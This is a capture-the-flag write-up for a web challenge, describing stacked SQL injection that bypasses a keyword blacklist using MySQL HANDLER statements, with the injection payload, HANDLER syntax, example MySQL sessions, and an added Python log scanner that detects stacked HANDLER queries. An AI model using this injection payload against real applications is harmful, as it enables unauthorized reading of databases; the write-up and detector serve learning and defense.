
BUU web Blacklist

Appending 1' produces an error, which confirms that SQL injection is present.
Submitting 1'# returns normally.
But submitting 1'select# returns the blacklist message.

Too much is blocked, so consider stacked injection.
Enumerate the databases.

Find the table names.

Find the column names.

But since keywords such as select and prepare are blocked, I did not know how to proceed from here.
So I looked at an expert's writeup (wp):
It turns out HANDLER queries apparently perform even better than SELECT, and the keyword is not filtered.
The expert's payload:
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

Usage of HANDLER:
HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE
// e.g. HANDLER tbl_name OPEN AS example
// then HANDLER example READ index_name="example2"
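The blacklist in this challenge only matches keywords such as select and prepare, so a stacked HANDLER statement passes straight through it; the same gap is visible on the server side in the general query log. As an added example that is not from the original writeup, the following Python splits constructed MySQL general-log lines into statements (quote-aware) and flags HANDLER statements that arrive stacked behind the application's own query; the log layout, the words table and the FlagHere name are assumptions.

```python
import re

# Constructed MySQL general-query-log lines (not from the original writeup).
# Layout approximates general_log: "<time>\t<id> Query\t<sql>".
SAMPLE_LOG = """\
2024-05-01T10:00:01.000000Z\t   7 Query\tSELECT * FROM words WHERE id = '1'
2024-05-01T10:00:02.000000Z\t   7 Query\tSELECT * FROM words WHERE id = '1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#'
2024-05-01T10:00:03.000000Z\t   7 Query\tSELECT * FROM words WHERE id = 'it''s; not a handler'
2024-05-01T10:00:04.000000Z\t   8 Query\tSHOW DATABASES
"""

LOG_RE = re.compile(r"^(\S+)\t\s*(\d+) Query\t(.*)$")
HANDLER_RE = re.compile(r"^handler\s+\S+\s+(open|read|close)\b", re.I)

def split_statements(sql: str) -> list[str]:
    """Split on ';' outside quoted strings. Doubled quotes ('') work
    naturally because the second quote simply reopens a string;
    backslash escapes are not handled."""
    stmts, buf, quote = [], [], None
    for ch in sql:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            buf.append(ch)
        elif ch == ";":
            stmts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    stmts.append("".join(buf))
    return [s.strip() for s in stmts if s.strip()]

def find_handler_abuse(log_text: str) -> list[tuple[int, str]]:
    """Return (connection id, statement) for every HANDLER statement that
    arrives stacked behind another statement in one query string."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        conn_id, stmts = int(m.group(2)), split_statements(m.group(3))
        for s in stmts[1:]:  # position 0 is the application's own query
            if HANDLER_RE.match(s):
                hits.append((conn_id, s))
    return hits
```

A keyword denylist cannot be made complete this way; parameterized queries and a driver configured without multi-statement support remove the stacked-query path that the log scan above only detects after the fact.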

A few examples:
mysql> handler test open as c; //open
Query OK, 0 rows affected (0.01 sec)

mysql> handler c read PRIMARY=(5); //look up by primary key
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 5 | def | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)

mysql> handler c close; //close
Query OK, 0 rows affected (0.00 sec)

mysql> handler test open; //open
Query OK, 0 rows affected (0.00 sec)

mysql> handler test read data first; //data index, first record
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 1 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)

mysql> handler test read data next; //next record
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 2 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)

mysql> handler test read data prev; //previous record
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 1 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.01 sec)

mysql> handler test read data last; //last record
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 9 | yza | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)

mysql> handler test read data=("yza");
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 9 | yza | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.01 sec)

mysql> handler test read data=("abc") limit 5;
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 1 | abc | 2016-07-18 23:44:05 |
| 2 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
2 rows in set (0.00 sec)